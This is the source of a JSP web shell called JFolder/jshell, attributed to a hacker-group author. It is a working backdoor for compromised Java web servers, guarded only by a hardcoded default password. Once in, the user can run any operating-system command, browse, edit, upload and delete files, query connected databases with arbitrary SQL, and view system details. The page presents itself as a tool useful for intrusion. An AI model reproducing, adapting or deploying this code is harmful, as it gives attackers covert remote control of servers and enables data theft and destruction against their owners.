<%@ page contentType="text/html; charset=GBK" %> <%@ page import="java.io.*"%> <%@ page import="java.util.Map"%> <%@ page import="java.util.HashMap"%> <%@ page import="java.nio.charset.Charset"%> <%@ page import="java.util.regex.*"%> <%@ page import="java.sql.*"%> <%! private String _password = "password"; private String _encodeType = "GB2312"; private int _sessionOutTime = 20; private String[] _textFileTypes = {"txt", "htm", "html", "asp", "jsp", "java", "js", "css", "c", "cpp", "sh", "pl", "cgi", "php", "conf", "xml", "xsl", "ini", "vbs", "inc"}; private Connection _dbConnection = null; private Statement _dbStatement = null; private String _url = null; public boolean validate(String password) { if (password.equals(_password)) { return true; } else { return false; } } public String HTMLEncode(String str) { str = str.replaceAll(" ", " "); str = str.replaceAll("<", "<"); str = str.replaceAll(">", ">"); str = str.replaceAll("\r\n", "
"); return str; } public String Unicode2GB(String str) { String sRet = null; try { sRet = new String(str.getBytes("ISO8859_1"), _encodeType); } catch (Exception e) { sRet = str; } return sRet; } public String exeCmd(String cmd) { Runtime runtime = Runtime.getRuntime(); Process proc = null; String retStr = ""; InputStreamReader insReader = null; char[] tmpBuffer = new char[1024]; int nRet = 0; try { proc = runtime.exec(cmd); insReader = new InputStreamReader(proc.getInputStream(), Charset.forName("GB2312")); while ((nRet = insReader.read(tmpBuffer, 0, 1024)) != -1) { retStr += new String(tmpBuffer, 0, nRet); } insReader.close(); retStr = HTMLEncode(retStr); } catch (Exception e) { retStr = "bad command \"" + cmd + "\""; } finally { return retStr; } } public String pathConvert(String path) { String sRet = path.replace('\\', '/'); File file = new File(path); if (file.getParent() != null) { if (file.isDirectory()) { if (! sRet.endsWith("/")) sRet += "/"; } } else { if (! sRet.endsWith("/")) sRet += "/"; } return sRet; } public String strCut(String str, int len) { String sRet; len -= 3; if (str.getBytes().length <= len) { sRet = str; } else { try { sRet = (new String(str.getBytes(), 0, len, "GBK")) + "..."; } catch (Exception e) { sRet = str; } } return sRet; } public String listFiles(String path, String curUri) { File[] files = null; File curFile = null; String sRet = null; int n = 0; boolean isRoot = path.equals(""); path = pathConvert(path); try { if (isRoot) { files = File.listRoots(); } else { try { curFile = new File(path); String[] sFiles = curFile.list(); files = new File[sFiles.length]; for (n = 0; n < sFiles.length; n ++) { files[n] = new File(path + sFiles[n]); } } catch (Exception e) { sRet = "bad path \"" + path + "\""; } } if (sRet == null) { sRet = "\n"; sRet += "\n"; sRet += "\n"; sRet += " \n"; if (curFile != null) { sRet += " \n"; sRet += " \n"; sRet += " \n"; } sRet += "\n"; sRet += " \n"; for (n = 0; n < files.length; n ++) { sRet += " \n"; if (! isRoot) { sRet += " \n"; if (files[n].isDirectory()) { sRet += " \n"; } else { sRet += " \n"; } sRet += " \n"; sRet += " \n"; } else { sRet += " \n"; } sRet += " \n"; } sRet += " \n"; sRet += "
\n"; sRet += "  上级目录 "; sRet += "创建目录 "; sRet += "新建文件 "; sRet += "删除 "; sRet += "复制 "; sRet += "重命名 "; sRet += "上传文件\n"; sRet += " \n"; sRet += "
<" + strCut(files[n].getName(), 50) + ">" + strCut(files[n].getName(), 50) + "" + (files[n].isDirectory() ? "<dir>" : "") + ((! files[n].isDirectory()) && isTextFile(getExtName(files[n].getPath())) ? "<edit>" : "") + "" + files[n].length() + "" + pathConvert(files[n].getPath()) + "
\n"; } } catch (SecurityException e) { sRet = "security violation, no privilege."; } return sRet; } public boolean isTextFile(String extName) { int i; boolean bRet = false; if (! extName.equals("")) { for (i = 0; i < _textFileTypes.length; i ++) { if (extName.equals(_textFileTypes[i])) { bRet = true; break; } } } else { bRet = true; } return bRet; } public String getExtName(String fileName) { String sRet = ""; int nLastDotPos; fileName = pathConvert(fileName); nLastDotPos = fileName.lastIndexOf("."); if (nLastDotPos == -1) { sRet = ""; } else { sRet = fileName.substring(nLastDotPos + 1); } return sRet; } public String browseFile(String path) { String sRet = ""; File file = null; FileReader fileReader = null; path = pathConvert(path); try { file = new File(path); fileReader = new FileReader(file); String fileString = ""; char[] chBuffer = new char[1024]; int ret; sRet = "\n"; } catch (IOException e) { sRet += "\n"; } return sRet; } public String openFile(String path, String curUri) { String sRet = ""; boolean canOpen = false; int nLastDotPos = path.lastIndexOf("."); String extName = ""; String fileString = null; File curFile = null; path = pathConvert(path); if (nLastDotPos == -1) { canOpen = true; } else { extName = path.substring(nLastDotPos + 1); canOpen = isTextFile(extName); } if (canOpen) { try { fileString = ""; curFile = new File(path); FileReader fileReader = new FileReader(curFile); char[] chBuffer = new char[1024]; int nRet; while ((nRet = fileReader.read(chBuffer, 0, 1024)) != -1) { fileString += new String(chBuffer, 0, nRet); } fileReader.close(); } catch (IOException e) { fileString = null; sRet = "不能打开文件\"" + path + "\""; } catch (SecurityException e) { fileString = null; sRet = "安全问题,没有权限执行该操作"; } } else { sRet = "file \"" + path + "\" is not a text file, can't be opened in text mode"; } if (fileString != null) { sRet += "\n"; sRet += "\n"; sRet += " \n"; sRet += " \n"; sRet += " \n"; sRet += " \n"; sRet += " \n"; sRet += " \n"; sRet += " \n"; sRet += " \n"; sRet += " \n"; sRet += " \n"; sRet += " \n"; sRet += "
[上级目录]
\n"; sRet += " \n"; sRet += "
 
\n"; } return sRet; } public String saveFile(String path, String curUri, String fileContent) { String sRet = ""; File file = null; path = pathConvert(path); try { file = new File(path); if (! file.canWrite()) { sRet = "文件不可写"; } else { FileWriter fileWriter = new FileWriter(file); fileWriter.write(fileContent); fileWriter.close(); sRet = "文件保存成功,正在返回,请稍候……\n"; sRet += "\n"; } } catch (IOException e) { sRet = "保存文件失败"; } catch (SecurityException e) { sRet = "安全问题,没有权限执行该操作"; } return sRet; } public String createFolder(String path, String curUri, String folderName) { String sRet = ""; File folder = null; path = pathConvert(path); try { folder = new File(path + folderName); if (folder.exists() && folder.isDirectory()) { sRet = "\"" + path + folderName + "\"目录已经存在"; } else { if (folder.mkdir()) { sRet = "成功创建目录\"" + pathConvert(folder.getPath()) + "\",正在返回,请稍候……\n"; sRet += ""; } else { sRet = "创建目录\"" + folderName + "\"失败"; } } } catch (SecurityException e) { sRet = "安全问题,没有权限执行该操作"; } return sRet; } public String createFile(String path, String curUri, String fileName) { String sRet = ""; File file = null; path = pathConvert(path); try { file = new File(path + fileName); if (file.createNewFile()) { sRet = ""; } else { sRet = "\"" + path + fileName + "\"文件已经存在"; } } catch (SecurityException e) { sRet = "安全问题,没有权限执行该操作"; } catch (IOException e) { sRet = "创建文件\"" + path + fileName + "\"失败"; } return sRet; } public String deleteFile(String path, String curUri, String[] files2Delete) { String sRet = ""; File tmpFile = null; try { for (int i = 0; i < files2Delete.length; i ++) { tmpFile = new File(files2Delete[i]); if (! tmpFile.delete()) { sRet += "删除\"" + files2Delete[i] + "\"失败
\n"; } } if (sRet.equals("")) { sRet = "删除成功,正在返回,请稍候……\n"; sRet += ""; } } catch (SecurityException e) { sRet = "安全问题,没有权限执行该操作\n"; } return sRet; } public String saveAs(String path, String curUri, String fileContent) { String sRet = ""; File file = null; FileWriter fileWriter = null; try { file = new File(path); if (file.createNewFile()) { fileWriter = new FileWriter(file); fileWriter.write(fileContent); fileWriter.close(); sRet = ""; } else { sRet = "文件\"" + path + "\"已经存在"; } } catch (IOException e) { sRet = "创建文件\"" + path + "\"失败"; } return sRet; } public String uploadFile(ServletRequest request, String path, String curUri) { String sRet = ""; File file = null; InputStream in = null; path = pathConvert(path); try { in = request.getInputStream(); byte[] inBytes = new byte[request.getContentLength()]; int nBytes; int start = 0; int end = 0; int size = 1024; String token = null; String filePath = null; // // 把输入流读入一个字节数组 // while ((nBytes = in.read(inBytes, start, size)) != -1) { start += nBytes; } in.close(); // // 从字节数组中得到文件分隔符号 // int i = 0; byte[] seperator; while (inBytes[i] != 13) { i ++; } seperator = new byte[i]; for (i = 0; i < seperator.length; i ++) { seperator[i] = inBytes[i]; } // // 得到Header部分 // String dataHeader = null; i += 3; start = i; while (! (inBytes[i] == 13 && inBytes[i + 2] == 13)) { i ++; } end = i - 1; dataHeader = new String(inBytes, start, end - start + 1); // // 得到文件名 // token = "filename=\""; start = dataHeader.indexOf(token) + token.length(); token = "\""; end = dataHeader.indexOf(token, start) - 1; filePath = dataHeader.substring(start, end + 1); filePath = pathConvert(filePath); String fileName = filePath.substring(filePath.lastIndexOf("/") + 1); // // 得到文件内容开始位置 // i += 4; start = i; /* boolean found = true; byte[] tmp = new byte[seperator.length]; while (i <= inBytes.length - 1 - seperator.length) { for (int j = i; j < i + seperator.length; j ++) { if (seperator[j - i] != inBytes[j]) { found = false; break; } else tmp[j - i] = inBytes[j]; } if (found) break; i ++; }*/ // // 偷懒的办法 // end = inBytes.length - 1 - 2 - seperator.length - 2 - 2; // // 保存为文件 // File newFile = new File(path + fileName); newFile.createNewFile(); FileOutputStream out = new FileOutputStream(newFile); //out.write(inBytes, start, end - start + 1); out.write(inBytes, start, end - start + 1); out.close(); sRet = "\n"; } catch (IOException e) { sRet = "\n"; } sRet += ""; return sRet; } public boolean fileCopy(String srcPath, String dstPath) { boolean bRet = true; try { FileInputStream in = new FileInputStream(new File(srcPath)); FileOutputStream out = new FileOutputStream(new File(dstPath)); byte[] buffer = new byte[1024]; int nBytes; while ((nBytes = in.read(buffer, 0, 1024)) != -1) { out.write(buffer, 0, nBytes); } in.close(); out.close(); } catch (IOException e) { bRet = false; } return bRet; } public String getFileNameByPath(String path) { String sRet = ""; path = pathConvert(path); if (path.lastIndexOf("/") != -1) { sRet = path.substring(path.lastIndexOf("/") + 1); } else { sRet = path; } return sRet; } public String copyFiles(String path, String curUri, String[] files2Copy, String dstPath) { String sRet = ""; int i; path = pathConvert(path); dstPath = pathConvert(dstPath); for (i = 0; i < files2Copy.length; i ++) { if (! fileCopy(files2Copy[i], dstPath + getFileNameByPath(files2Copy[i]))) { sRet += "文件\"" + files2Copy[i] + "\"复制失败
"; } } if (sRet.equals("")) { sRet = "文件复制成功,正在返回,请稍候……"; sRet += ""; } return sRet; } public boolean isFileName(String fileName) { boolean bRet = false; Pattern p = Pattern.compile("^[a-zA-Z0-9][\\w\\.]*[\\w]$"); Matcher m = p.matcher(fileName); bRet = m.matches(); return bRet; } public String renameFile(String path, String curUri, String file2Rename, String newName) { String sRet = ""; path = pathConvert(path); file2Rename = pathConvert(file2Rename); try { File file = new File(file2Rename); newName = file2Rename.substring(0, file2Rename.lastIndexOf("/") + 1) + newName; File newFile = new File(newName); if (! file.exists()) { sRet = "文件\"" + file2Rename + "\"不存在"; } else { file.renameTo(newFile); sRet = "文件重命名成功,正在返回,请稍候……"; sRet += ""; } } catch (SecurityException e) { sRet = "安全问题导致文件\"" + file2Rename + "\"复制失败"; } return sRet; } public boolean DBInit(String dbType, String dbServer, String dbPort, String dbUsername, String dbPassword, String dbName) { boolean bRet = true; String driverName = ""; if (dbServer.equals("")) dbServer = "localhost"; try { if (dbType.equals("sqlserver")) { driverName = "com.microsoft.jdbc.sqlserver.SQLServerDriver"; if (dbPort.equals("")) dbPort = "1433"; _url = "jdbc:microsoft:sqlserver://" + dbServer + ":" + dbPort + ";User=" + dbUsername + ";Password=" + dbPassword + ";DatabaseName=" + dbName; } else if (dbType.equals("mysql")) { driverName = "com.mysql.jdbc.Driver"; if (dbPort.equals("")) dbPort = "3306"; _url = "jdbc:mysql://" + dbServer + ":" + dbPort + ";User=" + dbUsername + ";Password=" + dbPassword + ";DatabaseName=" + dbName; } else if (dbType.equals("odbc")) { driverName = "sun.jdbc.odbc.JdbcOdbcDriver"; _url = "jdbc:odbc:dsn=" + dbName + ";User=" + dbUsername + ";Password=" + dbPassword; } else if (dbType.equals("oracle")) { driverName = "oracle.jdbc.driver.OracleDriver"; _url = "jdbc:oracle:thin@" + dbServer + ":" + dbPort + ":" + dbName; } else if (dbType.equals("db2")) { driverName = "com.ibm.db2.jdbc.app.DB2Driver"; _url = "jdbc:db2://" + dbServer + ":" + dbPort + "/" + dbName; } Class.forName(driverName); } catch (ClassNotFoundException e) { bRet = false; } return bRet; } public boolean DBConnect(String User, String Password) { boolean bRet = false; if (_url != null) { try { _dbConnection = DriverManager.getConnection(_url, User, Password); _dbStatement = _dbConnection.createStatement(); bRet = true; } catch (SQLException e) { bRet = false; } } return bRet; } public String DBExecute(String sql) { String sRet = ""; if (_dbConnection == null || _dbStatement == null) { sRet = "数据库没有正常连接"; } else { try { if (sql.toLowerCase().substring(0, 6).equals("select")) { ResultSet rs = _dbStatement.executeQuery(sql); ResultSetMetaData rsmd = rs.getMetaData(); int colNum = rsmd.getColumnCount(); int colType; sRet = "sql语句执行成功,返回结果
\n"; sRet += "\n"; sRet += " \n"; for (int i = 1; i <= colNum; i ++) { sRet += " \n"; } sRet += " \n"; while (rs.next()) { sRet += " \n"; for (int i = 1; i <= colNum; i ++) { colType = rsmd.getColumnType(i); sRet += " \n"; } sRet += " \n"; } sRet += "
" + rsmd.getColumnName(i) + "(" + rsmd.getColumnTypeName(i) + ")
"; switch (colType) { case Types.BIGINT: sRet += rs.getLong(i); break; case Types.BIT: sRet += rs.getBoolean(i); break; case Types.BOOLEAN: sRet += rs.getBoolean(i); break; case Types.CHAR: sRet += rs.getString(i); break; case Types.DATE: sRet += rs.getDate(i).toString(); break; case Types.DECIMAL: sRet += rs.getDouble(i); break; case Types.NUMERIC: sRet += rs.getDouble(i); break; case Types.REAL: sRet += rs.getDouble(i); break; case Types.DOUBLE: sRet += rs.getDouble(i); break; case Types.FLOAT: sRet += rs.getFloat(i); break; case Types.INTEGER: sRet += rs.getInt(i); break; case Types.TINYINT: sRet += rs.getShort(i); break; case Types.VARCHAR: sRet += rs.getString(i); break; case Types.TIME: sRet += rs.getTime(i).toString(); break; case Types.DATALINK: sRet += rs.getTimestamp(i).toString(); break; } sRet += "
\n"; rs.close(); } else { if (_dbStatement.execute(sql)) { sRet = "sql语句执行成功"; } else { sRet = "sql语句执行失败"; } } } catch (SQLException e) { sRet = "sql语句执行失败"; } } return sRet; } public void DBRelease() { try { if (_dbStatement != null) { _dbStatement.close(); _dbStatement = null; } if (_dbConnection != null) { _dbConnection.close(); _dbConnection = null; } } catch (SQLException e) { } } ///////////////////////////////////////////////////////////////////////////////////////////////////////////////// class JshellConfig { private String _jshellContent = null; private String _path = null; public JshellConfig(String path) throws JshellConfigException { _path = path; read(); } private void read() throws JshellConfigException { try { FileReader jshell = new FileReader(new File(_path)); char[] buffer = new char[1024]; int nChars; _jshellContent = ""; while ((nChars = jshell.read(buffer, 0, 1024)) != -1) { _jshellContent += new String(buffer, 0, nChars); } jshell.close(); } catch (IOException e) { throw new JshellConfigException("打开文件失败"); } } public void save() throws JshellConfigException { FileWriter jshell = null; try { jshell = new FileWriter(new File(_path)); char[] buffer = _jshellContent.toCharArray(); int start = 0; int size = 1024; for (start = 0; start < buffer.length - 1 - size; start += size) { jshell.write(buffer, start, size); } jshell.write(buffer, start, buffer.length - 1 - start); } catch (IOException e) { new JshellConfigException("写文件失败"); } finally { try { jshell.close(); } catch (IOException e) { } } } public void setPassword(String password) throws JshellConfigException { Pattern p = Pattern.compile("\\w+"); Matcher m = p.matcher(password); if (! m.matches()) { throw new JshellConfigException("密码不能有除字母数字下划线以外的字符"); } p = Pattern.compile("private\\sString\\s_password\\s=\\s\"" + _password + "\""); m = p.matcher(_jshellContent); if (! m.find()) { throw new JshellConfigException("程序体已经被非法修改"); } _jshellContent = m.replaceAll("private String _password = \"" + password + "\""); //return HTMLEncode(_jshellContent); } public void setEncodeType(String encodeType) throws JshellConfigException { Pattern p = Pattern.compile("[A-Za-z0-9]+"); Matcher m = p.matcher(encodeType); if (! m.matches()) { throw new JshellConfigException("编码格式只能是字母和数字的组合"); } p = Pattern.compile("private\\sString\\s_encodeType\\s=\\s\"" + _encodeType + "\""); m = p.matcher(_jshellContent); if (! m.find()) { throw new JshellConfigException("程序体已经被非法修改"); } _jshellContent = m.replaceAll("private String _encodeType = \"" + encodeType + "\""); //return HTMLEncode(_jshellContent); } public void setSessionTime(String sessionTime) throws JshellConfigException { Pattern p = Pattern.compile("\\d+"); Matcher m = p.matcher(sessionTime); if (! m.matches()) { throw new JshellConfigException("session超时时间只能填数字"); } p = Pattern.compile("private\\sint\\s_sessionOutTime\\s=\\s" + _sessionOutTime); m = p.matcher(_jshellContent); if (! m.find()) { throw new JshellConfigException("程序体已经被非法修改"); } _jshellContent = m.replaceAll("private int _sessionOutTime = " + sessionTime); //return HTMLEncode(_jshellContent); } public void setTextFileTypes(String[] textFileTypes) throws JshellConfigException { Pattern p = Pattern.compile("\\w+"); Matcher m = null; int i; String fileTypes = ""; String tmpFileTypes = ""; for (i = 0; i < textFileTypes.length; i ++) { m = p.matcher(textFileTypes[i]); if (! m.matches()) { throw new JshellConfigException("扩展名只能是字母数字和下划线的组合"); } if (i != textFileTypes.length - 1) fileTypes += "\"" + textFileTypes[i] + "\"" + ", "; else fileTypes += "\"" + textFileTypes[i] + "\""; } for (i = 0; i < _textFileTypes.length; i ++) { if (i != _textFileTypes.length - 1) tmpFileTypes += "\"" + _textFileTypes[i] + "\"" + ", "; else tmpFileTypes += "\"" + _textFileTypes[i] + "\""; } p = Pattern.compile(tmpFileTypes); m = p.matcher(_jshellContent); if (! m.find()) { throw new JshellConfigException("程序文件已经被非法修改"); } _jshellContent = m.replaceAll(fileTypes); //return HTMLEncode(_jshellContent); } public String getContent() { return HTMLEncode(_jshellContent); } } class JshellConfigException extends Exception { public JshellConfigException(String message) { super(message); } } %> 测试 <% session.setMaxInactiveInterval(_sessionOutTime * 60); if (request.getParameter("password") == null && session.getAttribute("password") == null) { // show the login form //================================================================================================ %>
8管理登录 :::... JFolder_By_hack520
<% //================================================================================================ // end of the login form } else { String password = null; if (session.getAttribute("password") == null) { password = (String)request.getParameter("password"); if (validate(password) == false) { out.println("
  • 哎呀,倒霉死啦!
  • "); out.close(); return; } session.setAttribute("password", password); } else { password = (String)session.getAttribute("password"); } String action = null; if (request.getParameter("action") == null) action = "main"; else action = (String)request.getParameter("action"); if (action.equals("exit")) { session.removeAttribute("password"); response.sendRedirect(request.getRequestURI()); out.close(); return; } // show the main menu //==================================================================================== %>
    <% //===================================================================================== // end of main menu if (action.equals("main")) { // print the system info table //======================================================================================= %>
    服务器信息
    服务器名 <%=request.getServerName()%>
    服务器端口 <%=request.getServerPort()%>
    操作系统 <%=System.getProperty("os.name") + " " + System.getProperty("os.version") + " " + System.getProperty("os.arch")%>
    当前用户名 <%=System.getProperty("user.name")%>
    当前用户目录 <%=System.getProperty("user.home")%>
    当前用户工作目录 <%=System.getProperty("user.dir")%>
    程序相对路径 <%=request.getRequestURI()%>
    程序绝对路径 <%=request.getRealPath(request.getServletPath())%>
    网络协议 <%=request.getProtocol()%>
    服务器软件版本信息 <%=application.getServerInfo()%>
    JDK版本 <%=System.getProperty("java.version")%>
    JDK安装路径 <%=System.getProperty("java.home")%>
    JAVA虚拟机版本 <%=System.getProperty("java.vm.specification.version")%>
    JAVA虚拟机名 <%=System.getProperty("java.vm.name")%>
    JAVA类路径 <%=System.getProperty("java.class.path")%>
    JAVA载入库搜索路径 <%=System.getProperty("java.library.path")%>
    JAVA临时目录 <%=System.getProperty("java.io.tmpdir")%>
    JIT编译器名 <%=System.getProperty("java.compiler") == null ? "" : System.getProperty("java.compiler")%>
    扩展目录路径 <%=System.getProperty("java.ext.dirs")%>
    客户端信息
    客户机地址 <%=request.getRemoteAddr()%>
    服务机器名 <%=request.getRemoteHost()%>
    用户名 <%=request.getRemoteUser() == null ? "" : request.getRemoteUser()%>
    请求方式 <%=request.getScheme()%>
    应用安全套接字层 <%=request.isSecure() == true ? "是" : "否"%>
    <% //======================================================================================= // end of printing the system info table ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// } else if (action.equals("filesystem")) { String curPath = ""; String result = ""; String fsAction = ""; if (request.getParameter("curPath") == null) { curPath = request.getRealPath(request.getServletPath()); curPath = pathConvert((new File(curPath)).getParent()); } else { curPath = Unicode2GB((String)request.getParameter("curPath")); } if (request.getParameter("fsAction") == null) { fsAction = "list"; } else { fsAction = (String)request.getParameter("fsAction"); } if (fsAction.equals("list")) result = listFiles(curPath, request.getRequestURI() + "?action=" + action); else if (fsAction.equals("browse")) { result = listFiles(new File(curPath).getParent(), request.getRequestURI() + "?action=" + action); result += browseFile(curPath); } else if (fsAction.equals("open")) result = openFile(curPath, request.getRequestURI() + "?action=" + action); else if (fsAction.equals("save")) { if (request.getParameter("fileContent") == null) { result = "页面导航错误"; } else { String fileContent = Unicode2GB((String)request.getParameter("fileContent")); result = saveFile(curPath, request.getRequestURI() + "?action=" + action, fileContent); } } else if (fsAction.equals("createFolder")) { if (request.getParameter("folderName") == null) { result = "目录名不能为空"; } else { String folderName = Unicode2GB(request.getParameter("folderName").trim()); if (folderName.equals("")) { result = "目录名不能为空"; } else { result = createFolder(curPath, request.getRequestURI() + "?action=" + action, folderName); } } } else if (fsAction.equals("createFile")) { if (request.getParameter("fileName") == null) { result = "文件名不能为空"; } else { String fileName = Unicode2GB(request.getParameter("fileName").trim()); if (fileName.equals("")) { result = "文件名不能为空"; } else { result = createFile(curPath, request.getRequestURI() + "?action=" + action, fileName); } } } else if (fsAction.equals("deleteFile")) { if (request.getParameter("filesDelete") == null) { result = "没有选择要删除的文件"; } else { String[] files2Delete = (String[])request.getParameterValues("filesDelete"); if (files2Delete.length == 0) { result = "没有选择要删除的文件"; } else { for (int n = 0; n < files2Delete.length; n ++) { files2Delete[n] = Unicode2GB(files2Delete[n]); } result = deleteFile(curPath, request.getRequestURI() + "?action=" + action, files2Delete); } } } else if (fsAction.equals("saveAs")) { if (request.getParameter("fileContent") == null) { result = "页面导航错误"; } else { String fileContent = Unicode2GB(request.getParameter("fileContent")); result = saveAs(curPath, request.getRequestURI() + "?action=" + action, fileContent); } } else if (fsAction.equals("upload")) { result = uploadFile(request, curPath, request.getRequestURI() + "?action=" + action); } else if (fsAction.equals("copyto")) { if (request.getParameter("filesDelete") == null || request.getParameter("dstPath") == null) { result = "没有选择要复制的文件"; } else { String[] files2Copy = request.getParameterValues("filesDelete"); String dstPath = request.getParameter("dstPath").trim(); if (files2Copy.length == 0) { result = "没有选择要复制的文件"; } else if (dstPath.equals("")) { result = "没有填写要复制到的目录路径"; } else { for (int i = 0; i < files2Copy.length; i ++) files2Copy[i] = Unicode2GB(files2Copy[i]); result = copyFiles(curPath, request.getRequestURI() + "?action=" + action, files2Copy, Unicode2GB(dstPath)); } } } else if (fsAction.equals("rename")) { if (request.getParameter("fileRename") == null) { result = "页面导航错误"; } else { String file2Rename = request.getParameter("fileRename").trim(); String newName = request.getParameter("newName").trim(); if (file2Rename.equals("")) { result = "没有选择要重命名的文件"; } else if (newName.equals("")) { result = "没有填写新文件名"; } else { result = renameFile(curPath, request.getRequestURI() + "?action=" + action, Unicode2GB(file2Rename), Unicode2GB(newName)); } } } %>
    地址
    <%= result.trim().equals("")?" " : result%>
    <% ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// } else if (action.equals("command")) { String cmd = ""; InputStream ins = null; String result = ""; if (request.getParameter("command") != null) { cmd = (String)request.getParameter("command"); result = exeCmd(cmd); } // print the command form //======================================================================================== %>
    执行命令
    执行结果
    <%=result == "" ? " " : result%>
    <% //========================================================================================= // end of printing command form /////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// } else if (action.equals("database")) { String dbAction = ""; String result = ""; String dbType = ""; String dbServer = ""; String dbPort = ""; String dbUsername = ""; String dbPassword = ""; String dbName = ""; String dbResult = ""; String sql = ""; if (request.getParameter("dbAction") == null) { dbAction = "main"; } else { dbAction = request.getParameter("dbAction").trim(); if (dbAction.equals("")) dbAction = "main"; } if (dbAction.equals("main")) { result = " "; } else if (dbAction.equals("dbConnect")) { if (request.getParameter("dbType") == null || request.getParameter("dbServer") == null || request.getParameter("dbPort") == null || request.getParameter("dbUsername") == null || request.getParameter("dbPassword") == null || request.getParameter("dbName") == null) { response.sendRedirect(request.getRequestURI() + "?action=" + action); } else { dbType = request.getParameter("dbType").trim(); dbServer = request.getParameter("dbServer").trim(); dbPort = request.getParameter("dbPort").trim(); dbUsername = request.getParameter("dbUsername").trim(); dbPassword = request.getParameter("dbPassword").trim(); dbName = request.getParameter("dbName").trim(); if (DBInit(dbType, dbServer, dbPort, dbUsername, dbPassword, dbName)) { if (DBConnect(dbUsername, dbPassword)) { if (request.getParameter("sql") != null) { sql = request.getParameter("sql").trim(); if (! sql.equals("")) { dbResult = DBExecute(sql); } } result = "\n"; result += "sql语句

     \n"; DBRelease(); } else { result = "数据库连接失败"; } } else { result = "数据库连接驱动没有找到"; } } } %> ">
    数据库连接类型
    数据库服务器地址
    数据库服务器端口
    数据库用户名
    数据库密码
    数据库名
    <%=result%>
    <%=dbResult%>
    <% //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// } else if (action.equals("config")) { String cfAction = ""; int i; if (request.getParameter("cfAction") == null) { cfAction = "main"; } else { cfAction = request.getParameter("cfAction").trim(); if (cfAction.equals("")) cfAction = "main"; } if (cfAction.equals("main")) { // start of config form //========================================================================================== %> " onSubmit="javascript:selectAllTypes()">
    密码
    系统编码
    Session超时时间
    可编辑文件类型

    <% } else if (cfAction.equals("save")) { if (request.getParameter("password") == null || request.getParameter("encode") == null || request.getParameter("sessionTime") == null || request.getParameterValues("textFileTypes") == null) { response.sendRedirect(request.getRequestURI()); } String result = ""; String newPassword = request.getParameter("password").trim(); String newEncodeType = request.getParameter("encode").trim(); String newSessionTime = request.getParameter("sessionTime").trim(); String[] newTextFileTypes = request.getParameterValues("textFileTypes"); String jshellPath = request.getRealPath(request.getServletPath()); try { JshellConfig jconfig = new JshellConfig(jshellPath); jconfig.setPassword(newPassword); jconfig.setEncodeType(newEncodeType); jconfig.setSessionTime(newSessionTime); jconfig.setTextFileTypes(newTextFileTypes); jconfig.save(); result += "设置保存成功,正在返回,请稍候……"; result += ""; } catch (JshellConfigException e) { result = "" + e.getMessage() + ""; } %>
    <%=result == "" ? " " : result%>
    <% } ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// //========================================================================================== // end of config form } else if (action.equals("about")) { // start of about //========================================================================================== %>
    关于 jshell ver 0.1
    增加了显示alxea排名的功能,这对于入侵中也比较方便些,版权还是归作者的.
    hack520 by hack520 and welcome to 华夏黑客同盟
    <% //========================================================================================== } } %>